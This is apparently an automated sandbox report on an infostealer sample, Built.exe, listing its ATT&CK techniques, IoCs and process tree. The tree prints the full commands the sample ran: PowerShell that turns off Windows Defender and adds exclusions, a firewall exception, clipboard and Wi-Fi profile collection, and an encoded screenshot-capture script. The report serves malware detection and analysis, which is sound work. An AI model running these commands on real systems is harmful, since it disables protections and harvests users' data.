ec85a3399e1d254160c5b2aa775162bd283d123ae9bf3691fb5b2b5746d6a0c2

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
10/02/2025, 09:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.9MB
MD5

00eddff674f7ed6b55a50ff39b765f0e
SHA1

c92d1f2c7012c562bfc71b207da2d87c1b6a701b
SHA256

ec85a3399e1d254160c5b2aa775162bd283d123ae9bf3691fb5b2b5746d6a0c2
SHA512

25a0cb1bf76aa2bbe6e1f8b03b330f6244a5f024d4b6e4e9213251508626b93c203420421481cc1b20d271639d156dc8505e981bfc5a1b3cc48d46b8d361605c
SSDEEP

98304:Z/WvITBg6O/CIamaHl3Ne4i3lqoFhTWrf9eQc0MJYzwZNqkz+as5J1n6ksB0rN9y:ZUIq/CpeNlpYfMQc2s8hn6ksqdhK

Score

8^/10

collection defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1784	powershell.exe
1948	powershell.exe
4852	powershell.exe
1240	powershell.exe
3228	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
964	netsh.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2856	powershell.exe
4800	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\762cf45d4d65a6702f2d1846da2292fc.exe	bound.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\762cf45d4d65a6702f2d1846da2292fc.exe	bound.exe

Executes dropped EXE 2 IoCs

pid	Process
1760	bound.exe
3460	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe
4872	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2211717155-842865201-3404093980-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\762cf45d4d65a6702f2d1846da2292fc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bound.exe\" .."	bound.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\762cf45d4d65a6702f2d1846da2292fc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bound.exe\" .."	bound.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
55	discord.com
62	discord.com
32	discord.com
33	discord.com
49	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4164	tasklist.exe
2168	tasklist.exe
724	tasklist.exe

UPX packed file 46 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c28-22.dat	upx
behavioral2/memory/4872-26-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp	upx
behavioral2/files/0x0008000000023bd2-28.dat	upx
behavioral2/files/0x0008000000023c21-32.dat	upx
behavioral2/memory/4872-31-0x00007FFE81200000-0x00007FFE81224000-memory.dmp	upx
behavioral2/memory/4872-50-0x00007FFE86C60000-0x00007FFE86C6F000-memory.dmp	upx
behavioral2/files/0x0008000000023c07-49.dat	upx
behavioral2/files/0x0008000000023c06-48.dat	upx
behavioral2/files/0x0008000000023c05-47.dat	upx
behavioral2/files/0x0008000000023c04-46.dat	upx
behavioral2/files/0x0008000000023c03-45.dat	upx
behavioral2/files/0x0008000000023bd4-44.dat	upx
behavioral2/files/0x0008000000023bd3-43.dat	upx
behavioral2/files/0x0008000000023bd1-42.dat	upx
behavioral2/files/0x000b000000023c41-41.dat	upx
behavioral2/files/0x0008000000023c2c-40.dat	upx
behavioral2/files/0x0008000000023c2b-39.dat	upx
behavioral2/files/0x0008000000023c27-36.dat	upx
behavioral2/files/0x0008000000023c0f-35.dat	upx
behavioral2/memory/4872-56-0x00007FFE81190000-0x00007FFE811BD000-memory.dmp	upx
behavioral2/memory/4872-58-0x00007FFE860F0000-0x00007FFE86109000-memory.dmp	upx
behavioral2/memory/4872-60-0x00007FFE80F80000-0x00007FFE80FA3000-memory.dmp	upx
behavioral2/memory/4872-62-0x00007FFE719C0000-0x00007FFE71B30000-memory.dmp	upx
behavioral2/memory/4872-64-0x00007FFE86090000-0x00007FFE860A9000-memory.dmp	upx
behavioral2/memory/4872-66-0x00007FFE84D80000-0x00007FFE84D8D000-memory.dmp	upx
behavioral2/memory/4872-68-0x00007FFE80E90000-0x00007FFE80EBE000-memory.dmp	upx
behavioral2/memory/4872-73-0x00007FFE80D60000-0x00007FFE80E18000-memory.dmp	upx
behavioral2/memory/4872-76-0x00007FFE81200000-0x00007FFE81224000-memory.dmp	upx
behavioral2/memory/4872-75-0x00007FFE71640000-0x00007FFE719B5000-memory.dmp	upx
behavioral2/memory/4872-72-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp	upx
behavioral2/memory/4872-78-0x00007FFE81B40000-0x00007FFE81B54000-memory.dmp	upx
behavioral2/memory/4872-81-0x00007FFE812D0000-0x00007FFE812DD000-memory.dmp	upx
behavioral2/memory/4872-80-0x00007FFE81190000-0x00007FFE811BD000-memory.dmp	upx
behavioral2/memory/4872-85-0x00007FFE71520000-0x00007FFE7163C000-memory.dmp	upx
behavioral2/memory/4872-84-0x00007FFE860F0000-0x00007FFE86109000-memory.dmp	upx
behavioral2/memory/4872-108-0x00007FFE80F80000-0x00007FFE80FA3000-memory.dmp	upx
behavioral2/memory/4872-141-0x00007FFE719C0000-0x00007FFE71B30000-memory.dmp	upx
behavioral2/memory/4872-212-0x00007FFE86090000-0x00007FFE860A9000-memory.dmp	upx
behavioral2/memory/4872-239-0x00007FFE80E90000-0x00007FFE80EBE000-memory.dmp	upx
behavioral2/memory/4872-240-0x00007FFE80D60000-0x00007FFE80E18000-memory.dmp	upx
behavioral2/memory/4872-252-0x00007FFE71640000-0x00007FFE719B5000-memory.dmp	upx
behavioral2/memory/4872-270-0x00007FFE719C0000-0x00007FFE71B30000-memory.dmp	upx
behavioral2/memory/4872-264-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp	upx
behavioral2/memory/4872-265-0x00007FFE81200000-0x00007FFE81224000-memory.dmp	upx
behavioral2/memory/4872-279-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp	upx
behavioral2/memory/4872-309-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3260	cmd.exe
2420	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3060	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
764	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1948	powershell.exe
1948	powershell.exe
4852	powershell.exe
4852	powershell.exe
1784	powershell.exe
1784	powershell.exe
2240	powershell.exe
2240	powershell.exe
2856	powershell.exe
2856	powershell.exe
1948	powershell.exe
1948	powershell.exe
4852	powershell.exe
4852	powershell.exe
1784	powershell.exe
1784	powershell.exe
2240	powershell.exe
2856	powershell.exe
1240	powershell.exe
1240	powershell.exe
5024	powershell.exe
5024	powershell.exe
3228	powershell.exe
3228	powershell.exe
3636	powershell.exe
3636	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2168	tasklist.exe
Token: SeDebugPrivilege	4164	tasklist.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeIncreaseQuotaPrivilege	1272	WMIC.exe
Token: SeSecurityPrivilege	1272	WMIC.exe
Token: SeTakeOwnershipPrivilege	1272	WMIC.exe
Token: SeLoadDriverPrivilege	1272	WMIC.exe
Token: SeSystemProfilePrivilege	1272	WMIC.exe
Token: SeSystemtimePrivilege	1272	WMIC.exe
Token: SeProfSingleProcessPrivilege	1272	WMIC.exe
Token: SeIncBasePriorityPrivilege	1272	WMIC.exe
Token: SeCreatePagefilePrivilege	1272	WMIC.exe
Token: SeBackupPrivilege	1272	WMIC.exe
Token: SeRestorePrivilege	1272	WMIC.exe
Token: SeShutdownPrivilege	1272	WMIC.exe
Token: SeDebugPrivilege	1272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1272	WMIC.exe
Token: SeRemoteShutdownPrivilege	1272	WMIC.exe
Token: SeUndockPrivilege	1272	WMIC.exe
Token: SeManageVolumePrivilege	1272	WMIC.exe
Token: 33	1272	WMIC.exe
Token: 34	1272	WMIC.exe
Token: 35	1272	WMIC.exe
Token: 36	1272	WMIC.exe
Token: SeDebugPrivilege	724	tasklist.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeIncreaseQuotaPrivilege	1272	WMIC.exe
Token: SeSecurityPrivilege	1272	WMIC.exe
Token: SeTakeOwnershipPrivilege	1272	WMIC.exe
Token: SeLoadDriverPrivilege	1272	WMIC.exe
Token: SeSystemProfilePrivilege	1272	WMIC.exe
Token: SeSystemtimePrivilege	1272	WMIC.exe
Token: SeProfSingleProcessPrivilege	1272	WMIC.exe
Token: SeIncBasePriorityPrivilege	1272	WMIC.exe
Token: SeCreatePagefilePrivilege	1272	WMIC.exe
Token: SeBackupPrivilege	1272	WMIC.exe
Token: SeRestorePrivilege	1272	WMIC.exe
Token: SeShutdownPrivilege	1272	WMIC.exe
Token: SeDebugPrivilege	1272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1272	WMIC.exe
Token: SeRemoteShutdownPrivilege	1272	WMIC.exe
Token: SeUndockPrivilege	1272	WMIC.exe
Token: SeManageVolumePrivilege	1272	WMIC.exe
Token: 33	1272	WMIC.exe
Token: 34	1272	WMIC.exe
Token: 35	1272	WMIC.exe
Token: 36	1272	WMIC.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeIncreaseQuotaPrivilege	4676	WMIC.exe
Token: SeSecurityPrivilege	4676	WMIC.exe
Token: SeTakeOwnershipPrivilege	4676	WMIC.exe
Token: SeLoadDriverPrivilege	4676	WMIC.exe
Token: SeSystemProfilePrivilege	4676	WMIC.exe
Token: SeSystemtimePrivilege	4676	WMIC.exe
Token: SeProfSingleProcessPrivilege	4676	WMIC.exe
Token: SeIncBasePriorityPrivilege	4676	WMIC.exe
Token: SeCreatePagefilePrivilege	4676	WMIC.exe
Token: SeBackupPrivilege	4676	WMIC.exe
Token: SeRestorePrivilege	4676	WMIC.exe
Token: SeShutdownPrivilege	4676	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3836 wrote to memory of 4872	3836	Built.exe	84
PID 3836 wrote to memory of 4872	3836	Built.exe	84
PID 4872 wrote to memory of 2872	4872	Built.exe	88
PID 4872 wrote to memory of 2872	4872	Built.exe	88
PID 4872 wrote to memory of 3588	4872	Built.exe	89
PID 4872 wrote to memory of 3588	4872	Built.exe	89
PID 4872 wrote to memory of 2400	4872	Built.exe	90
PID 4872 wrote to memory of 2400	4872	Built.exe	90
PID 4872 wrote to memory of 948	4872	Built.exe	91
PID 4872 wrote to memory of 948	4872	Built.exe	91
PID 4872 wrote to memory of 1312	4872	Built.exe	96
PID 4872 wrote to memory of 1312	4872	Built.exe	96
PID 4872 wrote to memory of 1916	4872	Built.exe	97
PID 4872 wrote to memory of 1916	4872	Built.exe	97
PID 1312 wrote to memory of 2168	1312	cmd.exe	100
PID 1312 wrote to memory of 2168	1312	cmd.exe	100
PID 2400 wrote to memory of 1784	2400	cmd.exe	101
PID 2400 wrote to memory of 1784	2400	cmd.exe	101
PID 1916 wrote to memory of 4164	1916	cmd.exe	102
PID 1916 wrote to memory of 4164	1916	cmd.exe	102
PID 948 wrote to memory of 1760	948	cmd.exe	103
PID 948 wrote to memory of 1760	948	cmd.exe	103
PID 948 wrote to memory of 1760	948	cmd.exe	103
PID 3588 wrote to memory of 4852	3588	cmd.exe	104
PID 3588 wrote to memory of 4852	3588	cmd.exe	104
PID 4872 wrote to memory of 4844	4872	Built.exe	105
PID 4872 wrote to memory of 4844	4872	Built.exe	105
PID 2872 wrote to memory of 1948	2872	cmd.exe	106
PID 2872 wrote to memory of 1948	2872	cmd.exe	106
PID 4872 wrote to memory of 4800	4872	Built.exe	107
PID 4872 wrote to memory of 4800	4872	Built.exe	107
PID 4872 wrote to memory of 3832	4872	Built.exe	108
PID 4872 wrote to memory of 3832	4872	Built.exe	108
PID 4872 wrote to memory of 3780	4872	Built.exe	111
PID 4872 wrote to memory of 3780	4872	Built.exe	111
PID 4872 wrote to memory of 3260	4872	Built.exe	113
PID 4872 wrote to memory of 3260	4872	Built.exe	113
PID 4872 wrote to memory of 4516	4872	Built.exe	115
PID 4872 wrote to memory of 4516	4872	Built.exe	115
PID 4872 wrote to memory of 1188	4872	Built.exe	117
PID 4872 wrote to memory of 1188	4872	Built.exe	117
PID 4844 wrote to memory of 1272	4844	cmd.exe	121
PID 4844 wrote to memory of 1272	4844	cmd.exe	121
PID 3832 wrote to memory of 724	3832	cmd.exe	122
PID 3832 wrote to memory of 724	3832	cmd.exe	122
PID 1188 wrote to memory of 2240	1188	cmd.exe	123
PID 1188 wrote to memory of 2240	1188	cmd.exe	123
PID 4800 wrote to memory of 2856	4800	cmd.exe	146
PID 4800 wrote to memory of 2856	4800	cmd.exe	146
PID 3780 wrote to memory of 1400	3780	cmd.exe	125
PID 3780 wrote to memory of 1400	3780	cmd.exe	125
PID 3260 wrote to memory of 2420	3260	cmd.exe	126
PID 3260 wrote to memory of 2420	3260	cmd.exe	126
PID 4516 wrote to memory of 764	4516	cmd.exe	127
PID 4516 wrote to memory of 764	4516	cmd.exe	127
PID 4872 wrote to memory of 1172	4872	Built.exe	128
PID 4872 wrote to memory of 1172	4872	Built.exe	128
PID 1172 wrote to memory of 1600	1172	cmd.exe	143
PID 1172 wrote to memory of 1600	1172	cmd.exe	143
PID 4872 wrote to memory of 548	4872	Built.exe	131
PID 4872 wrote to memory of 548	4872	Built.exe	131
PID 2240 wrote to memory of 1788	2240	powershell.exe	133
PID 2240 wrote to memory of 1788	2240	powershell.exe	133
PID 548 wrote to memory of 4248	548	cmd.exe	134

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3836
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:1760
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\bound.exe" "bound.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3780
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8